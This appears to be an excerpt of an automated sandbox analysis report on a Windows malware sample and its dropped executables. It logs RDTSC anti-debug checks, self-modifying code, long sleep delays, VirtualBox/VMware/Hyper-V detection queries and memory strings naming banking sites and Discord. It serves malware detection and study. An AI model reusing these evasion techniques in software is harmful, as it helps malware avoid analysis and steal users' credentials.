Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90BCA second address: 4E90BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90C66 second address: 4E90CA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F423D327E2Eh 0x0000000f pop ebx 0x00000010 jmp 00007F423D327E30h 0x00000015 mov esp, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90CA3 second address: 4E90CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90CA7 second address: 4E90CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90CAD second address: 4E90CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov si, 9C1Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F423CC2AB22h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90CD1 second address: 4E90CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90CD5 second address: 4E90CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0A12 second address: 4EA0A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0A16 second address: 4EA0A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0A1C second address: 4EA0A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F10943 second address: 4F10948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F10948 second address: 4F10993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F423D327E35h 0x0000000a adc cl, FFFFFFC6h 0x0000000d jmp 00007F423D327E31h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dword ptr [esp], ebp 0x00000019 jmp 00007F423D327E2Eh 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F10993 second address: 4F109B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F109B0 second address: 4F109B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A3EC69 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BF580C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A3EB44 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C77748 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 79EC69 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 95580C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 79EB44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 9D7748 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Special instruction interceptor: First address: 1F780D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Special instruction interceptor: First address: 1F7789 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Special instruction interceptor: First address: 396C7A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Special instruction interceptor: First address: 1F7735 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Special instruction interceptor: First address: 425B71 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Special instruction interceptor: First address: 875812 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Special instruction interceptor: First address: 8528A3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Special instruction interceptor: First address: 13B3CED instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Special instruction interceptor: First address: 13B3D93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Special instruction interceptor: First address: 15DFF77 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Special instruction interceptor: First address: 147A4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Special instruction interceptor: First address: 2EC56F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Special instruction interceptor: First address: 2F4A98 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Special instruction interceptor: First address: 37EBFB instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Memory allocated: 4C00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Memory allocated: 4EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Memory allocated: 4C00000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04F10DAB rdtsc

0_2_04F10DAB

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 5_2_04DB0290 sldt word ptr [eax]

5_2_04DB0290

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1090	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6297
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1776
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6055
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1420
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window / User API: threadDelayed 2602
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window / User API: threadDelayed 7173

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1016495001\3f0b27a17c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1016496001\318ea9f50d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

API coverage: 5.2 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1020	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852	Thread sleep count: 1090 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852	Thread sleep time: -2181090s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4836	Thread sleep count: 308 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4836	Thread sleep time: -9240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe TID: 1248	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -39830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -39689s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -39564s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -39439s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -39314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -39189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -39064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -38939s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -38816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -38686s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -38580s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -38455s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -38330s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -38205s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -38080s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -37955s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -37830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -37705s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -37580s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -37455s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -37330s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -37205s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -37080s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -36955s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -36830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -36705s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -36580s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -36455s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -36330s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -36193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -36077s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -35939s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -35814s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -35689s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -35564s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -35439s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -35314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -35189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -35064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34939s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34814s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34689s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34564s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34439s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -34064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -33939s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -33814s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe TID: 3276	Thread sleep time: -33689s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe TID: 5004	Thread sleep time: -120000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	7_2_0040367D
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Code function: 7_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	7_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001D7978 FindFirstFileW,FindFirstFileW,free,	11_2_001D7978

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 11_2_001D881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,

11_2_001D881C

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 11_2_001DB5E0 GetSystemInfo,

11_2_001DB5E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 39830
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 39689
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 39564
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 39439
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 39314
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 39189
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 39064
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 38939
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 38816
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 38686
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 38580
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 38455
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 38330
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 38205
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 38080
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 37955
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 37830
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 37705
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 37580
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 37455
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 37330
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 37205
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 37080
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 36955
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 36830
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 36705
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 36580
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 36455
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 36330
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 36193
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 36077
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 35939
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 35814
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 35689
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 35564
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 35439
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 35314
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 35189
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 35064
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 34939
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 34814
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 34689
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 34564
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 34439
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 34314
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 34189
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 34064
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 33939
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 33814
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Thread delayed: delay time: 33689

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\extracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: file.exe, skotes.exe.0.dr	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.0000000005813000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 53fe16f582.exe, 00000024.00000003.3169822259.0000000006781000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jqY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlK'f(
Source: a98b6b83c7.exe, 00000025.00000003.3296615713.000000000580E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: skotes.exe, 00000005.00000002.3479841475.000000000118B000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2872487796.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000002.2941784959.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2990751286.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.3341620499.000000000135B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
